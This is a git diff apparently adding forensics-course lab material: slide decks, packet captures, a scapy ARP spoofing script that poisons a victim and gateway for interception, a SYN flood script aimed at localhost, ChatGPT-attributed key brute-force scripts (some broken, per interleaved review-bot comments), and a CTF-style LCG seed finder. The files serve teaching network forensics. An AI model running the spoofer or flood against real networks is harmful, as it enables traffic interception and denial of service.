diff --git a/Basic_Computer_Skills_for_Forensics/dd_image/usb_dd.7z b/Basic_Computer_Skills_for_Forensics/dd_image/usb_dd.7z
new file mode 100644
index 0000000..7bf646c
Binary files /dev/null and b/Basic_Computer_Skills_for_Forensics/dd_image/usb_dd.7z differ
diff --git a/Illegal_Possession_Images/SMTP_Email_Forensics.pptx b/Illegal_Possession_Images/SMTP_Email_Forensics.pptx
new file mode 100644
index 0000000..079c261
Binary files /dev/null and b/Illegal_Possession_Images/SMTP_Email_Forensics.pptx differ
diff --git a/Illegal_Possession_Images/lab_files/traffic/smtp.pcap b/Illegal_Possession_Images/lab_files/traffic/smtp.pcap
new file mode 100644
index 0000000..931b43b
Binary files /dev/null and b/Illegal_Possession_Images/lab_files/traffic/smtp.pcap differ
diff --git a/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx b/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx
index ea9612d..9b2563b 100644
Binary files a/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx and b/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx differ
diff --git a/Networking_Forensics/10_HTTP_tshark_Forensics_1_SYN_Flood.pptx b/Networking_Forensics/10_HTTP_tshark_Forensics_1_SYN_Flood.pptx
new file mode 100644
index 0000000..880f120
Binary files /dev/null and b/Networking_Forensics/10_HTTP_tshark_Forensics_1_SYN_Flood.pptx differ
diff --git a/Networking_Forensics/20_Wireless_aircrack_WEP40_1.pptx b/Networking_Forensics/20_Wireless_aircrack_WEP40_1.pptx
new file mode 100644
index 0000000..26d4f09
Binary files /dev/null and b/Networking_Forensics/20_Wireless_aircrack_WEP40_1.pptx differ
diff --git a/Networking_Forensics/30_SMTP_Email_Forensics.pptx b/Networking_Forensics/30_SMTP_Email_Forensics.pptx
new file mode 100644
index 0000000..079c261
Binary files /dev/null and b/Networking_Forensics/30_SMTP_Email_Forensics.pptx differ
diff --git a/Networking_Forensics/40_ARP_wireshark.pptx b/Networking_Forensics/40_ARP_wireshark.pptx
new file mode 100644
index 0000000..3ca246f
Binary files /dev/null and b/Networking_Forensics/40_ARP_wireshark.pptx differ
diff --git a/Networking_Forensics/code/arp_spoofer.py b/Networking_Forensics/code/arp_spoofer.py
new file mode 100644
index 0000000..10a6886
--- /dev/null
+++ b/Networking_Forensics/code/arp_spoofer.py
@@ -0,0 +1,93 @@ +# https://www.geeksforgeeks.org/python-how-to-create-an-arp-spoofer-using-scapy/ +# https://www.thepythoncode.com/article/building-arp-spoofer-using-scapy + +import scapy.all as scapy +import time +import argparse +import time +import os +import sys + +def get_mac(ip): + arp_request = scapy.ARP(pdst = ip) + broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff") + arp_request_broadcast = broadcast / arp_request + answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0] + return answered_list[0][1].hwsrc + +def spoof(target_ip, host_ip, verbose=True): + """ + Kali tells `target_ip` saying that "I have the host_ip that you want to talk". + However, Kali provides its own Mac address. + In target's arp: + Host IP, attacker's/Kali Mac address + """ + packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip), + psrc = host_ip) + scapy.send(packet, verbose = False) + + if verbose: + # get the MAC address of the default interface we are using + self_mac = scapy.ARP().hwsrc + print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) + + +def restore(destination_ip, source_ip): + destination_mac = get_mac(destination_ip) + source_mac = get_mac(source_ip) + packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac) + scapy.send(packet, verbose = False) + + +def _enable_linux_iproute(): + """ + Enables IP route ( IP Forward ) in linux-based distro + """ + file_path = "/proc/sys/net/ipv4/ip_forward" + with open(file_path) as f: + if f.read() == 1: + # already enabled + return + with open(file_path, "w") as f: + print(1, file=f) + + +def enable_ip_route(verbose=True): + """ + Enables IP forwarding + """ + if verbose: + print("[!] Enabling IP Routing...") + _enable_linux_iproute() + if verbose: + print("[!] 
IP Routing enabled.") + +if __name__ == "__main__": + # Get the command-line arguments + args = sys.argv + + # victim ip address + target = args[1] + # gateway ip address + host = args[2] + # print progress to the screen + verbose = True + # enable ip forwarding + enable_ip_route() + try: + sent_packets_count = 0 + while True: + # telling the `target` that we are the `host` + spoof(target, host, verbose) + # telling the `host` that we are the `target` + spoof(host, target, verbose) + + sent_packets_count = sent_packets_count + 2 + print("\r[*] Packets Sent "+str(sent_packets_count), end ="") + # sleep for two second + time.sleep(3) + except KeyboardInterrupt: + print("[!] Detected CTRL+C ! restoring the network, please wait...") + restore(target, host) + restore(host, target) + print("[+] Arp Spoof Stopped") diff --git a/Networking_Forensics/lab_files/SYN_Flood/mySYNFloodCapture.pcap b/Networking_Forensics/lab_files/SYN_Flood/mySYNFloodCapture.pcap new file mode 100644 index 0000000..2a929e4 Binary files /dev/null and b/Networking_Forensics/lab_files/SYN_Flood/mySYNFloodCapture.pcap differ diff --git a/Networking_Forensics/lab_files/SYN_Flood/synflood.py b/Networking_Forensics/lab_files/SYN_Flood/synflood.py new file mode 100644 index 0000000..1c23cb2 --- /dev/null +++ b/Networking_Forensics/lab_files/SYN_Flood/synflood.py @@ -0,0 +1,11 @@ +from scapy.all import * + +def send_syn(target_ip_address, target_port, number_of_packets_to_send = 4, size_of_packet = 65000): + ip = IP(dst=target_ip_address) + tcp = TCP(sport=RandShort(), dport=target_port, flags="S") + raw = Raw(b"X" * size_of_packet) + p = ip / tcp / raw + send(p, count=number_of_packets_to_send, verbose=0) + print('send_syn(): Sent ' + str(number_of_packets_to_send) + ' packets of '+ str(size_of_packet) + 'size to ' + target_ip_address + ' on port ' + str(target_port)) + +send_syn(target_ip_address = "127.0.0.1", target_port= 80) \ No newline at end of file 
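Review bot: In `_enable_linux_iproute` the early-return test `if f.read() == 1:` can never be true, because `f.read()` returns a string such as `"1\n"`, so the function always falls through to the write; compare against the stripped text instead: `if f.read().strip() == "1":`. The `import time` line appears twice and `argparse` and `os` are imported but never used, so the import block should be reduced to `scapy`, `time` and `sys`. The `# sleep for two second` comment in the main loop disagrees with `time.sleep(3)` on the next line; one of the two should change. `sys.argv[1]` and `sys.argv[2]` are read without a length check, so running the script with no arguments fails with an IndexError instead of a usage message.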
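Review bot: The progress message in `send_syn` is assembled by string concatenation and is missing a space before `size`, so it prints e.g. `... packets of 65000size to ...`; an f-string fixes both the spacing and readability: `print(f'send_syn(): Sent {number_of_packets_to_send} packets of {size_of_packet} bytes to {target_ip_address} on port {target_port}')`. `from scapy.all import *` pulls every scapy name into the module namespace; importing `IP`, `TCP`, `Raw`, `RandShort` and `send` by name would document what the lab file actually depends on. The module-level call `send_syn(...)` at the bottom runs on import, so it belongs under an `if __name__ == "__main__":` guard.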
diff --git a/Networking_Forensics/lab_files/f0335017_She_died_in_February_at_the_age_of_74.doc b/Networking_Forensics/lab_files/f0335017_She_died_in_February_at_the_age_of_74.doc
new file mode 100644
index 0000000..0bc91e2
Binary files /dev/null and b/Networking_Forensics/lab_files/f0335017_She_died_in_February_at_the_age_of_74.doc differ
diff --git a/Networking_Forensics/lab_files/traffic/arp.pcap b/Networking_Forensics/lab_files/traffic/arp.pcap
new file mode 100644
index 0000000..c0b6835
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/arp.pcap differ
diff --git a/Networking_Forensics/lab_files/traffic/arp_poison.pcap b/Networking_Forensics/lab_files/traffic/arp_poison.pcap
new file mode 100644
index 0000000..0bfb512
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/arp_poison.pcap differ
diff --git a/Networking_Forensics/lab_files/traffic/basic.log b/Networking_Forensics/lab_files/traffic/basic.log
new file mode 100644
index 0000000..c795867
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/basic.log differ
diff --git a/Networking_Forensics/lab_files/traffic/building_20201108_221645.jpg b/Networking_Forensics/lab_files/traffic/building_20201108_221645.jpg
new file mode 100644
index 0000000..87a358e
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/building_20201108_221645.jpg differ
diff --git a/Networking_Forensics/lab_files/traffic/image.html b/Networking_Forensics/lab_files/traffic/image.html
new file mode 100644
index 0000000..c3964d1
--- /dev/null
+++ b/Networking_Forensics/lab_files/traffic/image.html
@@ -0,0 +1,12 @@ + + + +

My First Heading

+ +

My first paragraph.

+ +UB + + +
diff --git a/Networking_Forensics/lab_files/traffic/image.log b/Networking_Forensics/lab_files/traffic/image.log
new file mode 100644
index 0000000..7a27a0e
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/image.log differ
diff --git a/Networking_Forensics/lab_files/traffic/image2.log b/Networking_Forensics/lab_files/traffic/image2.log
new file mode 100644
index 0000000..5e9e30d
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/image2.log differ
diff --git a/Networking_Forensics/lab_files/traffic/smtp.pcap b/Networking_Forensics/lab_files/traffic/smtp.pcap
new file mode 100644
index 0000000..931b43b
Binary files /dev/null and b/Networking_Forensics/lab_files/traffic/smtp.pcap differ
diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py
new file mode 100644
index 0000000..90a05ce
--- /dev/null
+++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU.py
@@ -0,0 +1,72 @@ +# Generated By ChatGPT DGL +# Write Python code that generates all possible combinations of 8 characters, +# with each character consisting of either a lowercase or uppercase English letter and +# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, +# the XOR sum of the 1st, 4th, 7th characters, +# and the XOR sum of the 2nd and 5th characters. +# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac +# Use Pytorch framework to use GPU + +import torch +import string +import hashlib +import time +import itertools + + +def generate_combinations_test(device): + ascii_codes = [ord(char) for char in "cgwpkexz"] + return torch.tensor([ascii_codes], dtype=torch.uint8, device=device) + + +def generate_combinations(device): + characters = string.ascii_lowercase + combinations = torch.tensor([list(map(ord, chars)) for chars in itertools.product( + characters, repeat=8)], dtype=torch.uint8, device=device) + return combinations + + +def check_xor_sum(combination): + xor_sum_0_3_6 = combination[:, 0].int( + ) ^ combination[:, 3].int() ^ combination[:, 6].int() + xor_sum_1_4_7 = combination[:, 1].int( + ) ^ combination[:, 4].int() ^ combination[:, 7].int() + xor_sum_2_5 = combination[:, 2].int() ^ combination[:, 5].int() + return (xor_sum_0_3_6 == 0x6b) & (xor_sum_1_4_7 == 0x76) & (xor_sum_2_5 == 0x12) + +def add_xy_and_check_sha1(valid_combinations, device): + letters = 'abcdefghijklmnopqrstuvwxyz' + xy_combinations = torch.tensor( + [[ord(x), ord(y)] for x in letters for y in letters], dtype=torch.uint8, device=device) + + final_results = [] + for combination in valid_combinations: + for xy in xy_combinations: + new_combination = torch.cat((combination[:3], xy[0].unsqueeze( + 0), combination[3:6], xy[1].unsqueeze(0), combination[6:]), dim=0) + sha1_hash = hashlib.sha1( + new_combination.cpu().numpy().tobytes()).hexdigest() + if sha1_hash.startswith('ff7b948953ac'): + final_results.append(new_combination) + 
return final_results + +if torch.cuda.is_available(): + device = torch.device("cuda") +else: + device = torch.device("cpu") + + +combinations = generate_combinations(device) +num_combinations = combinations.shape[0] +start_time = time.time() + +valid_combinations = combinations[check_xor_sum(combinations)] +valid_combinations = add_xy_and_check_sha1(valid_combinations, device) +if len(valid_combinations) > 0: + print(valid_combinations[0].char().cpu().numpy().tolist()) +else: + print("No valid combinations found") + +end_time = time.time() +print("Processing took %.2f seconds for %d combinations" % + (end_time - start_time, num_combinations)) \ No newline at end of file diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py new file mode 100644 index 0000000..1922ef9 --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_GPU_Improved_v1.py 
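Review bot: `generate_combinations` builds a Python list of every `itertools.product(characters, repeat=8)` row before calling `torch.tensor`, i.e. 26**8 (roughly 2e11) small lists, which will exhaust memory long before the tensor exists, so as written the script cannot complete on real hardware; the limitation should at least be stated in a comment, or the rows generated and filtered in bounded batches rather than materialised at once (the `_Improved_v1` variant in this commit iterates instead). The header comment says each character is "either a lowercase or uppercase English letter", but `characters = string.ascii_lowercase` covers lowercase only, so the comment should match the code. `generate_combinations_test` is defined but never called, and `num_combinations` exists only for the final print. In `add_xy_and_check_sha1` the SHA-1 is computed per candidate in a Python loop on the CPU, so the `device` argument does not accelerate that stage; a one-line comment saying so would stop a reader from expecting GPU work there.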
@@ -0,0 +1,76 @@ +# Generated By ChatGPT DGL +# Write Python code that generates all possible combinations of 8 characters, +# with each character consisting of either a lowercase or uppercase English letter and +# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, +# the XOR sum of the 1st, 4th, 7th characters, +# and the XOR sum of the 2nd and 5th characters. +# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac +# Use Pytorch framework to use GPU +# Generated By ChatGPT DGL +# Write Python code that generates all possible combinations of 8 characters, +# with each character consisting of either a lowercase or uppercase English letter and +# also has a function to check the XOR sum of the 0th, 3rd, 6th characters, +# the XOR sum of the 1st, 4th, 7th characters, +# and the XOR sum of the 2nd and 5th characters. +# Also add function to check sha1 hash of the combination startwith 0xff7b948953ac +# Use Pytorch framework to use GPU + +import torch +import string +import hashlib +import time +import itertools + + +def generate_combinations_test(device): + ascii_codes = [ord(char) for char in "cgwpkexz"] + return torch.tensor([ascii_codes], dtype=torch.uint8, device=device) + + +def check_xor_sum(combination): + xor_sum_0_3_6 = combination[:, 0].int( + ) ^ combination[:, 3].int() ^ combination[:, 6].int() + xor_sum_1_4_7 = combination[:, 1].int( + ) ^ combination[:, 4].int() ^ combination[:, 7].int() + xor_sum_2_5 = combination[:, 2].int() ^ combination[:, 5].int() + return (xor_sum_0_3_6 == 0x6b) & (xor_sum_1_4_7 == 0x76) & (xor_sum_2_5 == 0x12) + +def add_xy_and_check_sha1(valid_combinations, device): + letters = 'abcdefghijklmnopqrstuvwxyz' + xy_combinations = torch.tensor( + [[ord(x), ord(y)] for x in letters for y in letters], dtype=torch.uint8, device=device) + + final_results = [] + for combination in valid_combinations: + for xy in xy_combinations: + new_combination = torch.cat((combination[:3], 
xy[0].unsqueeze( + 0), combination[3:6], xy[1].unsqueeze(0), combination[6:]), dim=0) + sha1_hash = hashlib.sha1( + new_combination.cpu().numpy().tobytes()).hexdigest() + if sha1_hash.startswith('ff7b948953ac'): + final_results.append(new_combination) + return final_results + +if torch.cuda.is_available(): + device = torch.device("cuda") +else: + device = torch.device("cpu") + +start_time = time.time() +characters = string.ascii_lowercase +valid_combinations=[] +for e in torch.tensor([list(map(ord, chars)) for chars in itertools.product( + characters, repeat=8)], dtype=torch.uint8, device=device): + if check_xor_sum(e): + valid_combinations.append(e) + print(e) + +valid_combinations = add_xy_and_check_sha1(valid_combinations, device) +if len(valid_combinations) > 0: + print(valid_combinations[0].char().cpu().numpy().tolist()) +else: + print("No valid combinations found") + +end_time = time.time() +print("Processing took %.2f seconds for " % + (end_time - start_time)) \ No newline at end of file diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py new file mode 100644 index 0000000..b097699 --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU.py 
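Review bot: The scan loop calls `check_xor_sum(e)` on each 1-D row `e`, but `check_xor_sum` indexes with `combination[:, 0]`, which needs a 2-D batch, so the very first iteration raises an IndexError (too many indices); either call `check_xor_sum(e.unsqueeze(0))` or index the row directly with `e[0]`, `e[3]`, and so on. The header comment block is pasted twice and should appear once. The closing message `"Processing took %.2f seconds for " % (end_time - start_time)` lost its `%d combinations` argument in this variant, leaving a dangling `for `; drop the trailing words or report the number of rows scanned. Iterating `torch.tensor([...])` row by row still materialises the full 26**8-row list and tensor first, so this file has the same memory problem as the `generate_combinations`-based script in this commit.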
@@ -0,0 +1,59 @@ +# Write Python code that generates all possible combinations of 8 characters, +# with each character is a lowercase English letter and also has a function, check_xor_sum, +# to check the XOR sum of the 0th, 3rd, 6th characters is 0x6b, the XOR sum of the 1st, 4th, 7th characters is 0x76, +# and the XOR sum of the 2nd and 5th characters is 0x12. If check_xor_sum returns true, +# remember these valid combinations. Then write a function to generate all combinations of two lower case characters, +# call x and y, insert x after 3rd position and insert y after 6th position of valid combinations. +# The resultant new combination is 10 characters long strings. +# Also add function to check sha1 hash of the 10-character strings starts with ff7b948953ac. Print final results. + +import hashlib +import itertools + +def check_xor_sum(string): + if ord(string[0]) ^ ord(string[3]) ^ ord(string[6]) == 0x6b and \ + ord(string[1]) ^ ord(string[4]) ^ ord(string[7]) == 0x76 and \ + ord(string[2]) ^ ord(string[5]) == 0x12: + return True + return False + +def generate_8_char_combinations(): + characters = 'abcdefghijklmnopqrstuvwxyz' + combinations = itertools.product(characters, repeat=8) + valid_combinations = [] + for combination in combinations: + string = "".join(combination) + if check_xor_sum(string): + valid_combinations.append(string) + # valid_combinations = ["cgwpkexz"] + return valid_combinations + +def insert_letters(valid_combinations): + characters = 'abcdefghijklmnopqrstuvwxyz' + new_combinations = [] + for x in characters: + for y in characters: + for valid_combination in valid_combinations: + new_combination = valid_combination[:3] + x + \ + valid_combination[3:6] + y + valid_combination[6:] + new_combinations.append(new_combination) + return new_combinations + +def check_sha1_hash(new_combinations): + final_results = [] + for new_combination in new_combinations: + sha1_hash = hashlib.sha1(new_combination.encode('utf-8')).hexdigest() + if 
sha1_hash.startswith("ff7b948953ac"): + final_results.append(new_combination) + return final_results + +def main(): + valid_combinations = generate_8_char_combinations() + new_combinations = insert_letters(valid_combinations) + final_results = check_sha1_hash(new_combinations) + print("Final results:") + for result in final_results: + print(result) + +if __name__ == '__main__': + main() diff --git a/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py new file mode 100644 index 0000000..9d8e04a --- /dev/null +++ b/Networking_Forensics/lab_files/wlan_decrypt/crackWEP40_noGPU_Improved_v1.py 
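Review bot: `check_xor_sum` spells out `if cond: return True` followed by `return False`; returning the boolean expression directly is clearer: `return (ord(string[0]) ^ ord(string[3]) ^ ord(string[6]) == 0x6b and ord(string[1]) ^ ord(string[4]) ^ ord(string[7]) == 0x76 and ord(string[2]) ^ ord(string[5]) == 0x12)`. The parameter name `string` reuses the name of the stdlib module that the sibling scripts in this commit import, so `candidate` or `text` would read better. The commented-out `# valid_combinations = ["cgwpkexz"]` shortcut in `generate_8_char_combinations` should either be removed or become an explicit optional parameter, since commented-out code drifts from the surrounding logic.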
@@ -0,0 +1,55 @@ +import itertools +import string +import hashlib + + +def generate_combinations(): + characters = string.ascii_lowercase + combinations = itertools.product(characters, repeat=8) + # For testing only + # combinations = ["aaaaaaaa", "cgwpkexz", "cgwpkexa", "cgwpkexa", "cgwpkexa", "cgwpkexa"] + return combinations + + +def check_xor_sum(combination): + if ord(combination[0]) ^ ord( + combination[3]) ^ ord(combination[6]) != 0x6b : + return False + if ord(combination[1]) ^ ord( + combination[4]) ^ ord(combination[7]) != 0x76: + return False + if ord(combination[2]) ^ ord(combination[5]) != 0x12: + return False + return True + + +def insert_letters(valid_combination): + new_combinations = [] + characters = 'abcdefghijklmnopqrstuvwxyz' + for x in characters: + for y in characters: + new_combination = tuple(list(valid_combination[:3]) + [x] + + list(valid_combination[3:6]) + [y] + + list(valid_combination[6:])) + new_combinations.append(new_combination) + return new_combinations + +def check_sha1_hash(combination): + combination_str = ''.join(combination) + sha1_hash = hashlib.sha1(combination_str.encode('utf-8')) + return sha1_hash.hexdigest().startswith('ff7b948953ac') + + +cracked= False +for combination in generate_combinations(): + # print("process: ", ''.join(combination)) + if check_xor_sum(combination): + print("Match xor sum: ", ''.join(combination)) + for comb_x_y in insert_letters(combination): + if check_sha1_hash(comb_x_y): + cracked = True + print("Cracked: ", ''.join(comb_x_y)) + break + if cracked: + break + diff --git a/Networking_Forensics/lab_files/wlan_decrypt/file.xz b/Networking_Forensics/lab_files/wlan_decrypt/file.xz new file mode 100644 index 0000000..b466111 Binary files /dev/null and b/Networking_Forensics/lab_files/wlan_decrypt/file.xz differ diff --git a/Networking_Forensics/lab_files/wlan_decrypt/findseed.py b/Networking_Forensics/lab_files/wlan_decrypt/findseed.py new file mode 100644 index 0000000..964f217 --- /dev/null 
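Review bot: The search at module level relies on a `cracked` flag and two `break`s to leave the nested loops; moving it into a function that returns the first match removes the flag and lets the script run under an `if __name__ == "__main__":` guard instead of on import. `insert_letters` hardcodes `'abcdefghijklmnopqrstuvwxyz'` while `generate_combinations` uses `string.ascii_lowercase`; both should use the same constant. The `# For testing only` commented-out list in `generate_combinations` would be better as an optional parameter than as dead code.
```python
def find_match():
    """Return the first 10-character candidate whose SHA-1 matches, or None."""
    for combination in generate_combinations():
        if not check_xor_sum(combination):
            continue
        print("Match xor sum: ", ''.join(combination))
        for comb_x_y in insert_letters(combination):
            if check_sha1_hash(comb_x_y):
                return comb_x_y
    return None


if __name__ == "__main__":
    result = find_match()
    if result is not None:
        print("Cracked: ", ''.join(result))
```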
+++ b/Networking_Forensics/lab_files/wlan_decrypt/findseed.py @@ -0,0 +1,26 @@ +# https://www.vnsecurity.net/ctf%20-%20clgt%20crew/ +# 2015/03/16/codegate-good-crypto.html + +key=[0xa4,0x3d,0xf6,0xf3,0x74] +a, c, m = 0x000343fd, 0x269ec3, 0xFFFFFF +secret_key_bytes=5 + +for seed in range(1<<24): + correct = True + x = seed + + for i in range(secret_key_bytes): + x = (a * x + c) & m + # shift 16 bits to right + # the same as check the second most significant byte + if (x>>16)!=key[i]: + correct = False + break + + if correct: + print("Found it: ", hex(seed)) + print("Verify: ") + + for i in range(secret_key_bytes): + seed = (a* seed + c) & m + print(hex(seed>>16),hex(seed)) \ No newline at end of file
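Review bot: `m = 0xFFFFFF` is applied as a bitmask (`& m`), not as a modulus, so borrowing the `a, c, m` names from the LCG formula `x = (a*x + c) mod m` is misleading; the mask keeps 24 bits, which equals `mod 2**24` only because `0xFFFFFF == 2**24 - 1`, and a comment such as `# 24-bit state: & 0xFFFFFF is the same as mod 2**24` on that line would make the relation explicit. The comment `# the same as check the second most significant byte` does not match the code: relative to the 24-bit state the code actually keeps, `x >> 16` yields the most significant byte, so the comment should say so (or explain which wider word it is counting from). The verify loop reuses the loop variable `seed` as the LCG state, which works only because the `for` rebinds it on the next iteration but reads as if the search state were being modified; a separate local such as `state = seed` would be clearer. The search does not `break` after a hit, which is fine if several seeds may match but deserves a one-line comment saying that is intended.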